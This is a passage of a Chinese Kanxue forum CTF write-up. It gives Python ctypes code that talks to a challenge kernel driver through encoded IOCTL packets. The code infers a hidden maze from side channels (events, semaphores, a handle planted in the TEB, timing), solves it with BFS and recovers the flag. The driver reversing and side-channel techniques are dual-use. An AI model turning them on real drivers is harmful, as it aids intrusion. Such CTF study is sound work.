        ("ClientId", CLIENT_ID),
        ("AffinityMask", ctypes.c_size_t),
        ("Priority", wintypes.LONG),
        ("BasePriority", wintypes.LONG),
    ]
ntdll.NtQueryInformationThread.argtypes = [
    wintypes.HANDLE,
    wintypes.ULONG,
    wintypes.LPVOID,
    wintypes.ULONG,
    ctypes.POINTER(wintypes.ULONG),
]
ntdll.NtQueryInformationThread.restype = wintypes.LONG
class WinError(RuntimeError):
pass
def check_handle(handle, what):
if handle in (None, 0, INVALID_HANDLE_VALUE):
raise WinError(f"{what} failed, last_error=0x{ctypes.get_last_error():08X}")
return handle
def ror8(value, shift):
    value &= 0xFF
return ((value >> shift) | (value << (8 - shift))) & 0xFF
def encode_move_code(move_code):
return ror8(move_code ^ 0x5A, 5)
def current_teb_base():
    tbi = THREAD_BASIC_INFORMATION()
    returned = wintypes.ULONG()
    status = ntdll.NtQueryInformationThread(
        kernel32.GetCurrentThread(),
0,
        ctypes.byref(tbi),
        ctypes.sizeof(tbi),
        ctypes.byref(returned),
    )
if status != 0:
raise WinError(f"NtQueryInformationThread failed, status=0x{status & 0xFFFFFFFF:08X}")
return int(ctypes.cast(tbi.TebBaseAddress, ctypes.c_void_p).value)
def slot5_predicted_delay_ms(raw):
if len(raw) < 4:
return None
    tick_xor = struct.unpack_from(", raw, 0)[0]
    tick = tick_xor ^ 0xBAADF00D
return float((tick % 0x32) + 10)
def slot5_timing_hit(result, tolerance_ms=12.0):
    sig = result["signals"]
if sig["event_ok"] or sig["event_wall"] or sig["sem_ok"] or sig["sem_wall"] or sig["handle_ok"]:
return False
if result["last_error"] in (LEAK_OK, LEAK_WALL, LEAK_EXIT, LEAK_POISON):
return False
    predicted = result["slot5_predicted_ms"]
if predicted is None:
return False
return abs(result["time_ms"] - predicted) <= tolerance_ms
class ShadowGate:
def __init__(self):
        self.handle = None
        self.event_ok = None
        self.event_wall = None
        self.sem_ok = None
        self.sem_wall = None
        self.slot4_probe = None
        self._teb_1748_slot = None
        self._teb_1748_old = None
        self.op_count = 0
def open(self):
        self.handle = check_handle(
            kernel32.CreateFileW(
                DEVICE_NAME,
                GENERIC_READ | GENERIC_WRITE,
0,
None,
                OPEN_EXISTING,
                FILE_ATTRIBUTE_NORMAL,
None,
            ),
f"CreateFileW({DEVICE_NAME})",
        )
        self.event_ok = self._ensure_event(EVENT_OK_NAME)
        self.event_wall = self._ensure_event(EVENT_WALL_NAME)
        self.sem_ok = self._ensure_semaphore(SEMAPHORE_OK_GUID)
        self.sem_wall = self._ensure_semaphore(SEMAPHORE_WALL_GUID)
        self._install_slot4_probe()
return self
def close(self):
if self._teb_1748_slot is not None and self._teb_1748_old is not None:
            self._teb_1748_slot.value = self._teb_1748_old
        self._teb_1748_slot = None
        self._teb_1748_old = None
for attr in ("slot4_probe", "sem_wall", "sem_ok", "event_wall", "event_ok", "handle"):
            handle = getattr(self, attr)
if handle:
                kernel32.CloseHandle(handle)
setattr(self, attr, None)
def _ensure_event(self, name):
        candidates = [name]
if name.startswith("Global\"):
            candidates.append(name.split("\", 1)[1])
        last_exc = None
for candidate in candidates:
try:
return check_handle(kernel32.CreateEventW(None, True, False, candidate), f"CreateEventW({candidate})")
except WinError as exc:
                last_exc = exc
raise last_exc or WinError(f"CreateEventW({name}) failed")
def _ensure_semaphore(self, guid):
        candidates = (rf"Global\{guid}", guid)
        last_exc = None
for candidate in candidates:
try:
return check_handle(
                    kernel32.CreateSemaphoreW(None, 0, 0x7FFFFFFF, candidate),
f"CreateSemaphoreW({candidate})",
                )
except WinError as exc:
                last_exc = exc
raise last_exc or WinError(f"CreateSemaphoreW({guid}) failed")
def _install_slot4_probe(self):
        teb = current_teb_base()
        self.slot4_probe = check_handle(kernel32.CreateEventW(None, True, False, None), "CreateEventW(slot4_probe)")
        self._teb_1748_slot = ctypes.c_uint64.from_address(teb + 0x1748)
        self._teb_1748_old = self._teb_1748_slot.value
        self._teb_1748_slot.value = int(self.slot4_probe)
def _ioctl(self, code, in_bytes=b"", out_size=0):
        in_buf = ctypes.create_string_buffer(in_bytes, len(in_bytes)) if in_bytes else None
        out_buf = ctypes.create_string_buffer(out_size) if out_size else None
        returned = wintypes.DWORD()
        kernel32.SetLastError(0)
        ok = kernel32.DeviceIoControl(
            self.handle,
            code,
            in_buf,
len(in_bytes),
            out_buf,
            out_size,
            ctypes.byref(returned),
None,
        )
        last_error = ctypes.get_last_error() & 0xFFFFFFFF
if not ok:
raise WinError(f"DeviceIoControl(0x{code:08X}) failed, last_error=0x{last_error:08X}")
        data = out_buf.raw[: returned.value] if out_buf else b""
return data, last_error
def query_maze(self):
        data, _ = self._ioctl(IOCTL_QUERY, b"", 0x18)
return struct.unpack("<6I", data[:0x18])
def reset(self):
        self._clear_sync_objects()
        self._ioctl(IOCTL_RESET)
        self.op_count = 0
def move(self, ch):
        self._clear_sync_objects()
if self.slot4_probe:
            kernel32.SetHandleInformation(self.slot4_probe, HANDLE_FLAG_PROTECT_FROM_CLOSE, 0)
        move_code = MOVE_CODE[ch]
        encoded = encode_move_code(move_code)
        packet = struct.pack(", encoded, self.op_count, encoded ^ self.op_count ^ 0xDEAD1337)
        t0 = time.perf_counter()
        data, last_error = self._ioctl(IOCTL_MOVE, packet, 0x84)
        time_ms = (time.perf_counter() - t0) * 1000.0
        signals = self._collect_signals()
        outcome = self._classify_outcome(last_error, signals)
        predicted = slot5_predicted_delay_ms(data)
        self.op_count += 1
        credential = None
if len(data) >= 0x84 and struct.unpack_from(", data, 0x3C)[0] == WIN_MAGIC:
            length = struct.unpack_from(", data, 0x80)[0]
            credential = data[0x40 : 0x40 + min(length, 0x3F)].split(b"\x00", 1)[0].decode("ascii", errors="replace")
        result = {
"char": ch,
"move_code": move_code,
"encoded": encoded,
"outcome": outcome,
"last_error": last_error,
"signals": signals,
"time_ms": time_ms,
"slot5_predicted_ms": predicted,
"slot5_hit": False,
"raw": data,
"credential": credential,
        }
        result["slot5_hit"] = slot5_timing_hit(result)
return result
def _clear_sync_objects(self):
if self.event_ok:
            kernel32.ResetEvent(self.event_ok)
if self.event_wall:
            kernel32.ResetEvent(self.event_wall)
for sem in (self.sem_ok, self.sem_wall):
if sem:
while kernel32.WaitForSingleObject(sem, 0) == WAIT_OBJECT_0:
pass
def _collect_signals(self):
        handle_ok = False
if self.slot4_probe:
            flags = wintypes.DWORD()
if kernel32.GetHandleInformation(self.slot4_probe, ctypes.byref(flags)):
                handle_ok = bool(flags.value & HANDLE_FLAG_PROTECT_FROM_CLOSE)
return {
"event_ok": self._poll_event(self.event_ok),
"event_wall": self._poll_event(self.event_wall),
"sem_ok": self._poll_semaphore(self.sem_ok),
"sem_wall": self._poll_semaphore(self.sem_wall),
"handle_ok": handle_ok,
        }
def _classify_outcome(self, last_error, signals):
if last_error == LEAK_EXIT:
return "exit"
if last_error == LEAK_OK or signals["event_ok"] or signals["sem_ok"] or signals["handle_ok"]:
return "ok"
if last_error == LEAK_WALL or signals["event_wall"] or signals["sem_wall"]:
return "wall"
if last_error == LEAK_POISON:
return "poison"
return "unknown"
    @staticmethod
def _poll_event(handle):
if not handle:
return False
return kernel32.WaitForSingleObject(handle, 0) == WAIT_OBJECT_0
    @staticmethod
def _poll_semaphore(handle):
if not handle:
return False
        rc = kernel32.WaitForSingleObject(handle, 0)
return rc == WAIT_OBJECT_0
def shortest_path(open_edges, start, goal):
    queue = collections.deque([start])
    prev = {start: (None, None)}
while queue:
        cur = queue.popleft()
if cur == goal:
break
for move, nxt in open_edges.get(cur, {}).items():
if nxt not in prev:
                prev[nxt] = (cur, move)
                queue.append(nxt)
if goal not in prev:
return None
    path = []
    cur = goal
while prev[cur][0] is not None:
        cur, move = prev[cur]
        path.append(move)
    path.reverse()
return "".join(path)
def is_explicit_success(result):
return result["outcome"] in ("ok", "exit")
def is_explicit_wall(result):
return result["outcome"] in ("wall", "poison")
def replay_path(gate, path):
for move in path:
        result = gate.move(move)
if result["outcome"] in ("wall", "poison"):
raise WinError(f"replay failed at move {move}: {result}")
def probe_move(gate, route, move, cycle, attempts=8):
    result = None
for shift in range(attempts):
        gate.reset()
try:
            replay_path(gate, route)
except WinError:
continue
if cycle:
            out_move, back_move = cycle
            blocked = False
for _ in range(shift):
                out_res = gate.move(out_move)
if is_explicit_wall(out_res):
                    blocked = True
break
                back_res = gate.move(back_move)
if is_explicit_wall(back_res):
                    blocked = True
break
if blocked:
continue
        result = gate.move(move)
if result["slot5_hit"]:
continue
if is_explicit_success(result):
return True, result
if is_explicit_wall(result):
return False, result
return None, result
def solve_via_iterative_exploration(gate, width, height, start, goal, max_rounds=180):
    discovered = {start}
    open_edges = collections.defaultdict(dict)
    walls = set()
    pending = collections.deque([start])
    credential = None
    rounds = 0
while rounds < max_rounds and pending:
        rounds += 1
        progress = False
        queue = collections.deque(list(dict.fromkeys(pending)))
        pending.clear()
while queue:
            cell = queue.popleft()
            route = shortest_path(open_edges, start, cell) or ""
            cycle = None
if route:
                cycle = (INVERSE[route[-1]], route[-1])
elif "D" in open_edges[start]:
                cycle = ("D", "A")
for move, delta in DIRS.items():
                nx = cell[0] + delta[0]
                ny = cell[1] + delta[1]
if not (0 <= nx < width and 0 <= ny < height):
continue
                nxt = (nx, ny)
if move in open_edges[cell] or (cell, nxt) in walls:
continue
                decision, result = probe_move(gate, route, move, cycle, attempts=8)
if result and result["credential"]:
                    credential = result["credential"]
if decision is True:
                    progress = True
                    open_edges[cell][move] = nxt
                    open_edges[nxt][INVERSE[move]] = cell
if nxt not in discovered:
                        discovered.add(nxt)
                        pending.append(nxt)
                    pending.append(cell)
elif decision is False:
                    progress = True
                    walls.add((cell, nxt))
                    walls.add((nxt, cell))
else:
                    pending.append(cell)
        path = shortest_path(open_edges, start, goal)
if path:
if credential is None:
                gate.reset()
                replay_result = None
for move in path:
                    replay_result = gate.move(move)
if replay_result and replay_result["credential"]:
                    credential = replay_result["credential"]
return path, credential, open_edges
if not progress and not pending:
break
raise WinError("solve did not converge")
def render_ascii(width, height, open_edges):
    rows = [["#"] * (width * 2 + 1) for _ in range(height * 2 + 1)]
for y in range(height):
for x in range(width):
            rows[y * 2 + 1][x * 2 + 1] = "."
for (x, y), edges in open_edges.items():
for move, _ in edges.items():
if move == "D":
                rows[y * 2 + 1][x * 2 + 2] = " "
elif move == "S":
                rows[y * 2 + 2][x * 2 + 1] = " "
    rows[1][1] = "S"
    rows[height * 2 - 1][width * 2 - 1] = "E"
return "\n".join("".join(r) for r in rows)
def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("--probe", metavar="PATH")
    parser.add_argument("--solve", action="store_true")
    parser.add_argument("--show-map", action="store_true")
    args = parser.parse_args()
    gate = ShadowGate().open()
try:
        width, height, sx, sy, ex, ey = gate.query_maze()
print(f"maze: {width}x{height} start=({sx},{sy}) exit=({ex},{ey})")
print(f"events: ok={bool(gate.event_ok)} wall={bool(gate.event_wall)}")
print(f"semaphores: ok={bool(gate.sem_ok)} wall={bool(gate.sem_wall)}")
if args.probe:
            gate.reset()
for ch in args.probe.upper():
                result = gate.move(ch)
print(
f"{ch}: outcome={result['outcome']} "
f"last_error=0x{result['last_error']:08X} "
f"time_ms={result['time_ms']:.2f} "
f"slot5_predicted_ms={result['slot5_predicted_ms']} "
f"slot5_hit={result['slot5_hit']} "
f"signals={result['signals']}"
                )
return 0
if args.solve:
            path, credential, open_edges = solve_via_iterative_exploration(
                gate, width, height, (sx, sy), (ex, ey)
            )
print(f"path={path}")
if credential:
print(f"credential={credential}")
if args.show_map:
print(render_ascii(width, height, open_edges))
return 0
print("use --solve or --probe")
return 0
finally:
        gate.close()
if __name__ == "__main__":
    sys.exit(main())

① 单步观测 ShadowGate.move()

按协议构造MOVE_REQ

encoded_dir = ror8(move_code ^ 0x5A, 5)
checksum = encoded_dir ^ op_count ^ 0xDEAD1337

事件：MazeMoveOK / MazeMoveWall
信号量：A7F3... / B8E2...
LastError
TEB+0x1748 句柄标志
slot5 timing：raw[0:4] ^ 0xBAADF00D 反推出 predicted_ms

调 DeviceIoControl(IOCTL_MOVE)
同时采集 5 个槽位的观测：

② 单边判定 probe_move()

判断从当前格子朝某方向走一步，这条边是通还是墙？

做法是：

reset
replay 到当前待测格子
用一个已知成功的小回环 out/back 调整成功步相位
真正发一次待测 move
如果命中前四个结果槽位：

直接判 ok 或 wall

如果命中第五槽位：

只说明当前落在 phase5
不做结果判定，继续下一次尝试

③ 图搜索 solve_via_iterative_exploration()

从起点开始
对每个已发现格子的四个方向做 probe_move()
decision == True：

记成通路边，加入图

decision == False：

记成墙

decision == None：

暂时放回队列，后续再试

④ 最短路径

每次图有新边之后，用 shortest_path() 在当前已恢复图上跑 BFS：

找到起点到终点的最短路
一旦终点连通，再 replay 一次路径
从返回缓冲取 credential

通过如下命令执行算法（需要加载驱动）

python shadowgate_solve.py--solve

得到输出

maze: 13x13 start=(0,0) exit=(12,12)
events: ok=True wall=True
semaphores: ok=True wall=True
path=DDDDDDSSDDDDWWDDSSSSSSSSAASSSSDD
credential=flag{SHAD0WNT_HYPERVMX}

得到了最短路径和flag，具体执行时间有差异，在我的设备上应该在70s左右

五、构建地图

在前者的基础上设计建图脚本

⑤ 完整建图 explore_full_map()

核心数据结构：

open_edges

已确认通路边

walls

已确认墙边

discovered

已发现可达格子

tasks

尚未确认的候选边 (cell, move)

attempts

每条候选边已经回炉过多少次

流程如下：

从起点开始，把起点四个方向加入任务队列
每次从队列中取出一条候选边 (cell, move)
用 shortest_path(open_edges, start, cell) 求从起点到该格子的当前已知路径
调用 probe_move() 判断这条边
若 decision == True

将这条边加入 open_edges
把新到达的格子加入 discovered
再把这个新格子的候选边加入任务队列

若 decision == False

将该边加入 walls

若 decision == None

表示这次只命中 slot5 或暂时未定
该边最多回炉有限次数，再次入队

⑥ 地图收敛与最短路径

完整建图跑完后，脚本会得到完整的 ASCII 迷宫地图，open_edges，随后脚本再用 shortest_path() 在完整恢复的图上跑 BFS，得到起点到终点的最短路，并replay 一次，从返回缓冲中提取 credential。

通过如下命令执行算法（需要加载驱动）：

python shadowgate_map.py--map

得到输出：

maze: 13x13 start=(0,0) exit=(12,12)
events: ok=True wall=True
semaphores: ok=True wall=True
###########################
#S . . . . . .#.#. . . . .#
############# ####### ### #
#.#.#.#.#.#.#.#.#.#.#.#.#.#
############# ####### ### #
#. . . . .#.#. . . . .#.#.#
# ####### ############### #
#.#.#.#.#.#.#.#.#.#.#.#.#.#
# ####### ############### #
#.#.#. . . . . . . . .#.#.#
# ### ### ########### ### #
#.#.#.#.#.#.#.#.#.#.#.#.#.#
# ### ### ########### ### #
#.#.#.#.#.#.#. . .#.#.#.#.#
# ### ####### ### ####### #
#.#.#.#.#.#.#.#.#.#.#.#.#.#
# ### ####### ### ####### #
#.#.#. . . . .#.#.#.#. . .#
# ############### ### #####
#.#.#.#.#.#.#.#.#.#.#.#.#.#
# ############### ### #####
#. . .#.#. . .#.#.#.#.#.#.#
##### ### ### ### ### ### #
#.#.#.#.#.#.#.#.#.#.#.#.#.#
##### ### ### ### ### ### #
#. . . . .#.#.#.#. . . . E#
###########################
path=DDDDDDSSDDDDWWDDSSSSSSSSAASSSSDD
credential=flag{SHAD0WNT_HYPERVMX}
discovered=97
unresolved=0

得到了地图、最短路径和flag，具体执行时间有差异，在我的设备上应该在600s左右。

看雪ID：江树

*本文为看雪论坛精华文章，由江树原创，转载请注明来自看雪社区

# 往期推荐

球分享

球点赞

球在看

点击阅读原文查看更多